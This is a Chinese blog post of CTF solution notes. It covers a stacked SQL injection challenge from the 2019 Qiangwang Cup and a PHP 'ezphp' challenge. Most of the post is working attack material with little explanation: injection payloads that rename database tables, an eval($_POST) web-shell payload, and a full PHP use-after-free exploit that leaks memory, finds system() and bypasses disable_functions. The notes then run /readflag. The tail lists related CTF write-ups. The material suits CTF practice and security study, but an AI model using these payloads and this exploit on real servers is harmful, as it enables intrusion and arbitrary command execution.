end 21-4-19

最新推荐文章于 2022-10-24 16:59:06 发布
最新推荐文章于 2022-10-24 16:59:06 发布
阅读量188 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45781155/article/details/115875839
版权

强网杯 2019 随便注

http://www.bmzclub.cn:20431/?inject=1';show database;#

http://www.bmzclub.cn:20431/?inject=1';show tables;#

http://www.bmzclub.cn:20431/?inject=1';show columns from flagg;#

http://www.bmzclub.cn:20431/?inject=1';rename table words to word1;rename table flagg to words;alter table words add id int unsigned not Null auto_increment primary key;alert table words change flag data varchar(100);#

在这里插入图片描述

ezphp

disable_functions

a=eval($_POST[b]);&b=phpinfo();

https://xz.aliyun.com/t/8355#toc-3

exp:

 <?php
error_reporting(0);
$a = str_repeat("T", 120 * 1024 * 1024);
function i2s(&$a, $p, $i, $x = 8) {
    for($j = 0;$j < $x;$j++) {
        $a[$p + $j] = chr($i & 0xff);
        $i >>= 8;
    }
}

function s2i($s) {
    $result = 0;
    for ($x = 0;$x < strlen($s);$x++) {
        $result <<= 8;
        $result |= ord($s[$x]);
    }
    return $result;
}

function leak(&$a, $address) {
    global $s;
    i2s($a, 0x00, $address - 0x10);
    return strlen($s -> current());
}

function getPHPChunk($maps) {
    $pattern = '/([0-9a-f]+\-[0-9a-f]+) rw\-p 00000000 00:00 0 /';
    preg_match_all($pattern, $maps, $match);
    foreach ($match[1] as $value) {
        list($start, $end) = explode("-", $value);
        if (($length = s2i(hex2bin($end)) - s2i(hex2bin($start))) >= 0x200000 && $length <= 0x300000) {
            $address = array(s2i(hex2bin($start)), s2i(hex2bin($end)), $length);
            echo "[+]PHP Chunk: " . $start . " - " . $end . ", length: 0x" . dechex($length) . "\n";
            return $address;
        }
    }
}

function bomb1(&$a) {
    if (leak($a, s2i($_GET["test1"])) === 0x5454545454545454) {
        return (s2i($_GET["test1"]) & 0x7ffff0000000);
    }else {
        die("[!]Where is here");
    }
}

function bomb2(&$a) {
    $start = s2i($_GET["test2"]);
    return getElement($a, array($start, $start + 0x200000, 0x200000));
    die("[!]Not Found");
}

function getElement(&$a, $address) {
    for ($x = 0;$x < ($address[2] / 0x1000 - 2);$x++) {
        $addr = 0x108 + $address[0] + 0x1000 * $x + 0x1000;
        for ($y = 0;$y < 5;$y++) {
            if (leak($a, $addr + $y * 0x08) === 0x1234567812345678 && ((leak($a, $addr + $y * 0x08 - 0x08) & 0xffffffff) === 0x01)){
                echo "[+]SplDoublyLinkedList Element: " . dechex($addr + $y * 0x08 - 0x18) . "\n";
                return $addr + $y * 0x08 - 0x18;
            }
        }
    }
}

function getClosureChunk(&$a, $address) {
    do {
        $address = leak($a, $address);
    }while(leak($a, $address) !== 0x00);
    echo "[+]Closure Chunk: " . dechex($address) . "\n";
    return $address;
}

function getSystem(&$a, $address) {
    $start = $address & 0xffffffffffff0000;
    $lowestAddr = ($address & 0x0000fffffff00000) - 0x0000000001000000;
    for($i = 0; $i < 0x1000 * 0x80; $i++) {
        $addr = $start - $i * 0x20;
        if ($addr < $lowestAddr) {
            break;
        }
        $nameAddr = leak($a, $addr);
        if ($nameAddr > $address || $nameAddr < $lowestAddr) {
            continue;
        }
        $name = dechex(leak($a, $nameAddr));
        $name = str_pad($name, 16, "0", STR_PAD_LEFT);
        $name = strrev(hex2bin($name));
        $name = explode("\x00", $name)[0];
        if($name === "system") {
            return leak($a, $addr + 0x08);
        }
    }
}

class Trigger {
    function __destruct() {
        global $s;
        unset($s[0]);
        $a = str_shuffle(str_repeat("T", 0xf));
        i2s($a, 0x00, 0x1234567812345678);
        i2s($a, 0x08, 0x04, 7);
        $s -> current();
        $s -> next();
        if ($s -> current() !== 0x1234567812345678) {
             die("[!]UAF Failed");
        }
        $maps = file_get_contents("/proc/self/maps");
        if (!$maps) {
            cantRead($a);
        }else {
            canRead($maps, $a);
        }
        echo "[+]Done";
    }
}

function bypass($elementAddress, &$a) {
    global $s;
    if (!$closureChunkAddress = getClosureChunk($a, $elementAddress)) {
        die("[!]Get Closure Chunk Address Failed");
    }
    $closure_object = leak($a, $closureChunkAddress + 0x18);
    echo "[+]Closure Object: " . dechex($closure_object) . "\n";
    $closure_handlers = leak($a, $closure_object + 0x18);
    echo "[+]Closure Handler: " . dechex($closure_handlers) . "\n";
    if(!($system_address = getSystem($a, $closure_handlers))) {
        die("[!]Couldn't determine system address");
    }
    echo "[+]Find system's handler: " . dechex($system_address) . "\n";
    i2s($a, 0x08, 0x506, 7);
    for ($i = 0;$i < (0x130 / 0x08);$i++) {
        $data = leak($a, $closure_object + 0x08 * $i);
        i2s($a, 0x00, $closure_object + 0x30);
        i2s($s -> current(), 0x08 * $i + 0x100, $data);
    }
    i2s($a, 0x00, $closure_object + 0x30);
    i2s($s -> current(), 0x20, $system_address);
    i2s($a, 0x00, $closure_object);
    i2s($a, 0x08, 0x108, 7);
    echo "[+]Executing command: \n";
    ($s -> current())("php -v");
}

function canRead($maps, &$a) {
    global $s;
    if (!$chunkAddress = getPHPChunk($maps)) {
        die("[!]Get PHP Chunk Address Failed");
    }
    i2s($a, 0x08, 0x06, 7);
    if (!$elementAddress = getElement($a, $chunkAddress)) {
        die("[!]Get SplDoublyLinkedList Element Address Failed");
    }
    bypass($elementAddress, $a);
}

function cantRead(&$a) {
    global $s;
    i2s($a, 0x08, 0x06, 7);
    if (!isset($_GET["test1"]) && !isset($_GET["test2"])) {
        die("[!]Please try to get address of PHP Chunk");
    }
    if (isset($_GET["test1"])) {
        die(dechex(bomb1($a)));
    }
    if (isset($_GET["test2"])) {
        $elementAddress = bomb2($a);
    }
    if (!$elementAddress) {
        die("[!]Get SplDoublyLinkedList Element Address Failed");
    }
    bypass($elementAddress, $a);
}

$s = new SplDoublyLinkedList();
$s -> push(new Trigger());
$s -> push("Twings");
$s -> push(function($x){});
for ($x = 0;$x < 0x100;$x++) {
    $s -> push(0x1234567812345678);
}
$s -> rewind();
unset($s[0]);



a=eval($_POST[b]);&b=include('/var/tmp/exp.php');

在这里插入图片描述

/readflag:
在这里插入图片描述

闲人end
关注
专栏目录
PwnTheBox(web篇)---ezphp
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
05-08 831
文章目录PwnTheBox(web篇)---ezphp题目题解 PwnTheBox(web篇)—ezphp 题目 <?php $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } }
神经网络 | DeepVO:Towards End-to-End Visual Odometry
尘世冰封的专栏
03-28 2302
博主github:https://github.com/MichaelBeechan 博主CSDN:https://blog.csdn.net/u011344545 DeepVO代码:链接:https://pan.baidu.com/s/1bSNuZaj0KouXAXlhM4XK_g 提取码:wpzz 论文:http://www.cs.ox.ac.uk/files/9026/DeepVO.pdf ...
BMZCTF WEB_ezeval
lay_breeze的博客
08-19 175
BMZCTF WEB_ezeval 记一次做题思路 <?php highlight_file(__FILE__); $cmd=$_POST['cmd']; $cmd=htmlspecialchars($cmd); $black_list=array('php','echo','`','preg','server','chr','decode','html','md5','post','get','file','session','ascii','eval','replace','assert','ex
[第二届BMZCTF]easy_php
as you know, nlp is fantasitc!
01-17 495
[第二届BMZCTF]easy_php 写在前面的话:元旦打的比赛,现在终于有时间来复现,害,勤能补拙吧! 题目源码 <?php highlight_file(__FILE__); error_reporting(0); function new_addslashes($string) { if(!is_array($string)) return addslashes($string); foreach($string as $key => $val) $string[
buuctf web [BJDCTF2020]EzPHP
qq_40327508的博客
03-12 2839
进入后是这样的 查看源代码发现注释 base32解码得到1nD3x.php,发现是源码 <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; e...
22-10-8
w_g_y123456的博客
10-09 929
10-8日做题情况
论文:TransVG: End-to-End Visual Grounding with Transformers
m0_38064230的博客
11-02 3217
作者 Abstract 在本文中,我们提出了一个简洁而有效的基于转换的视觉基础框架,即TransVG,以解决将语言查询与图像上相应区域的基础任务。最先进的方法,包括两阶段或一阶段的方法,依赖于一个复杂的模块和手动设计的机制来执行查询推理和多模式融合。然而,在融合模块设计中,由于查询分解和图像场景图等机制的参与,使得模型很容易过度适应特定场景的数据集,限制了视觉语言环境之间的充分交互。为了避免这种警告,我们建议通过利用Transformer建立多模态对应关系,并通过经验证明,复杂的融合模块(例如,模块化注意
Pipeline-Trigger-2021-04-06T19-27-21.114Z:为工具链创建
04-13
标题中的“Pipeline-Trigger-2021-04-06T19-27-21.114Z:为工具链创建”暗示了这是一个关于自动化工作流程的项目,具体是针对构建和触发工具链的设置。在IT行业中,Pipeline通常指的是CI/CD(持续集成/持续部署)流程...
COVID-19疫情数据分析
weixin_43655621的博客
02-18 8160
新型冠状病毒感染的肺炎疫情爆发后,对人们的生活产生很大的影响。 现特对COVID-19疫情实时数据和历史数据进行爬取、分析、可视化展示。 设计框架 一、数据爬取 1.1 选择数据源: 选择网易的疫情实时动态播报平台作为数据源,地址:https://wp.m.163.com/163/page/news/virus_report/index.html?nw=1&anw=1 1.2 数据定位及抓取 导入相关库 import pandas as pd import requests import ti
论文笔记: FSRNet: End-to-End Learning Face Super-Resolution with Facial Priors
GunGunSeeBlood的专栏
10-08 2478
Yu Chen1,5∗ Ying Tai2∗ Xiaoming Liu3 Chunhua Shen4 Jian Yang1 1Nanjing University of Science and Technology 2Youtu Lab, Tencent 3Michigan State University 4University of Adela 具体而言,我们首先构造粗SR网络来恢复粗高分辨...
bugku ctf web8 (txt????)
qq_42777804的博客
08-02 678
进去网站 是如下的源码 <?php extract($_GET); if (!empty($ac)) { $f = trim(file_get_contents($fn)); if ($ac === $f) { echo "<p>This is flag:" ." $flag</p>"; } else { echo "<p>sorry!<...
[ctfshow web入门]常用姿势817-820 &&虎符ctf ezphp
weixin_45751765的博客
05-09 1322
0x00 前言 接上一篇继续记录ctfshow web入门常用姿势 嗝 820 非常规文件上传 php中的base64_decode只对合法字符合并后进行解码,非法字符会直接丢弃,不参与整体的base64解码 合法字符包括 A-Za-z0-9/+ 字母26+26 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2022-04-30 10:52:40 # @Last Modified by: h1xa # @Last Mod
BMZCLUB-WEB_ezeval
qq_24033605的博客
04-10 221
WEB_ezeval 打开得到一段PHP代码。 简单分析一下, 1.提交的方式为POST 2.注入点为cmd 3.绕过黑名单 应该是通过cmd命令打开/flag文件。但是system被列入了黑名单。 我们使用点绕过的方式。在PHP中,点符号是连接符的意思,相当于其他语言中的+。 这里构造payload为: cmd=(s.y.s.t.e.m)(‘dir’); ...
[HFCTF2022]ezphp
snowlyzz的博客
10-24 2622
FastCgi 缓存文件加载恶意so
HFCTF2022 Web ezphp
Sk1y的博客
03-28 5759
HFCTF2022 文章目录HFCTF2022ezphp ezphp 这个题目本来以为考点是p佬的文章,但是不是这样的。 p佬文章:我是如何利用环境变量注入执行任意命令
BUUCTF--[BJDCTF2020]EzPHP
qq_46263951的博客
07-30 484
在页面的源代码中我们可以发现一个BASE32码,解码后得到1nD3x.php 可以得到源代码 <?php highlight_file(__FILE__); error_reporting(0); $file = "1nD3x.php"; $shana = $_GET['shana']; $passwd = $_GET['passwd']; $arg = ''; $code = ''; echo "<br /><font color=red><B&g..
HECTF2020题解之ezphp
Mrs_H的博客
01-04 738
HECTF2020题解之ezphp 一 题目的来源 这道题的前身来源于NCTF2019的一道题名为“easyphp”,在HECTF中并没有完全复刻上述的题目,只是对其中的两个考点进行了参考,这篇文章也将对这其中的两个考点进行讲述。本文在在行文过程中同样参考了NCTF2019的官方wp,链接会放在文章最后。 二 题目描述 <?php error_reporting(0); highlight_file(__file__); include('flag.php'); $string_1 = $_GET
BMZCTF——web(hitcon_2017_ssrfme)
LizePing_的博客
07-09 303
BMZCTF——webhitcon_2017_ssrfme解题思路法尔??解题思路 所有题目wp都经过实践。可放心食用。 hitcon_2017_ssrfme 解题思路 打开题目,看到下面代码,尝试了解所表达的意思。 定义一个变量sandbox,沙箱。路径则是在字符串orange加上所访问的ip地址,php使用$_SERVER[“REMOTE_ADDR”]获取访问IP地址(浏览器输入ip就能看到)。 可以先测试一波,url随便写,再加上条件文件名 构造payload:?url=1&filena
python绘制日历图4-6月份
最新发布
05-31
[[0, 0, 0, 0, 0, 1, 2], [3, 4, 5, 6, 7, 8, 9], [10, 11, 12, 13, 14, 15, 16], [17, 18, 19, 20, 21, 22, 23], [24, 25, 26, 27, 28, 29, 30], [31, 0, 0, 0, 0, 0, 0]] June [[0, 0, 0, 0, 0, 1, 2], [3, 4, 5...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值